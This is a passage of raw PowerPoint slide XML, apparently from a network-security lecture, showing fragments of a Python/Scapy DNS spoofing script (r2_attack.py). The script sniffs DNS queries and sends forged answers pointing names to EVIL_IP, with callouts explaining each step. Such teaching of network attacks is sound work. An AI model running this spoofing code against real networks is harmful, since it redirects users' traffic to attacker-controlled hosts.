              </a:rPr>
              <a:t>original</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AE89385-D1CA-FE20-D16B-CD9B7228CB2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="66594" y="3893870"/>
            <a:ext cx="3271550" cy="1329535"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 43074"/>
              <a:gd name="adj2" fmla="val -9037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mj-lt"/>
              </a:rPr>
              <a:t>Creates the Response Record. Associates the searched name with the malicious IP address.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3779494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9EB87-018F-9B0E-5745-968AF1410FA7}"/>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3509A367-3ABA-0767-15FD-9397F1D49377}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418A17A1-27F3-AB7F-E758-89C55DD2A7BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>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en-US"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qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                aa=1,</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ra</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qd</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an=DNSRR(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rrname</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='A', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rclass</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>='IN', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ttl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=600, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rdata</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=EVIL_IP)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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spoofed_pkt</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ether_layer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ip_layer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udp_layer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dns_layer</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sendp</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spoofed_pkt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iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, verbose=False)            </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>try</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sniff(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, filter=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>f"udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> port 53 and </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host</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> {DNS_UNI_IP}",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prn</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dns_spoof</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, store=0)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>except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KeyboardInterrupt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print</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>("\n[*] Attack </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>stopped</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> by user.")</a:t>
              </a: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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59EBF56D-468F-C76A-2FB9-37099A043A9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>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/r2/r2_attack.py</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46B3C02E-F689-D5BA-FB49-1693CF39FAF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533524" y="116632"/>
            <a:ext cx="10048875" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7197293-87CE-A4AA-4DA9-16E7D775DF2D}"/>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7C035C35-508E-5AB9-E016-7C3490171DA3}"/>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6" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{257E29F4-F512-D727-4D08-55979A3DBE92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8775865" y="4586231"/>
            <a:ext cx="3271550" cy="652645"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -49524"/>
              <a:gd name="adj2" fmla="val -11292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mj-lt"/>
              </a:rPr>
              <a:t>send the packet over the network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0D158B7-166A-EC6C-8082-169D143B507F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="66594" y="1909973"/>
            <a:ext cx="2925988" cy="892604"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 38065"/>
              <a:gd name="adj2" fmla="val 157046"/>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mj-lt"/>
              </a:rPr>
              <a:t>Put DNS inside UDP, UDP inside IP, and IP inside Ethernet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2310489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D64E9-4A5C-78FC-2E71-96D7550FE84D}"/>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D444539D-D2C8-F92A-5123-1A0987C30362}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1103922" y="1429205"/>
            <a:ext cx="10478478" cy="4723944"/>
            <a:chOff x="126" y="3327"/>
            <a:chExt cx="5943" cy="759"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C47C5BB2-D4E8-B1A2-348C-0BD4B1F209C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3360"/>
              <a:ext cx="5943" cy="726"/>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en-US"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qr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>                aa=1,</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ra</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=1,</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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>qd</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an=DNSRR(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rrname</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='A', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rclass</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>='IN', </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ttl</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=600, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>rdata</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=EVIL_IP)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>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spoofed_pkt</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ether_layer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ip_layer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udp_layer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dns_layer</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sendp</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spoofed_pkt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iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, verbose=False)            </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>try</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sniff(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iface</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=INTERFACE, filter=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>f"udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> port 53 and </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host</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> {DNS_UNI_IP}",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prn</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dns_spoof</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>, store=0)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>except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KeyboardInterrupt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print</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>("\n[*] Attack </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>stopped</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> by user.")</a:t>
              </a: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p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="AutoShape 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{259F35A1-EBBB-D36A-29F1-45168463C886}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="176" y="3327"/>
              <a:ext cx="1939" cy="50"/>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/r2/r2_attack.py</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F818A97F-262E-E4BA-3960-027FD7F3ECF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1533524" y="116632"/>
            <a:ext cx="10048875" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Python code for DNS response spoofing and forwarding</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98E99A99-6825-BAFD-B5CD-C10C0BBB969B}"/>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8C44E24C-895C-A982-1288-D3380874009B}"/>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7" name="AutoShape 195">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02E08065-6AB6-7CB5-4868-D99ED87119EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7336824" y="5223406"/>
            <a:ext cx="2925988" cy="427886"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -125875"/>
              <a:gd name="adj2" fmla="val -118861"/>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mj-lt"/>
              </a:rPr>
              <a:t>the router sniffs traffic</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3117835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EDA33-4200-E85F-3A91-418891ACEFC1}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3F952F1-9D28-98A9-D1CC-F858E1CF1AA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
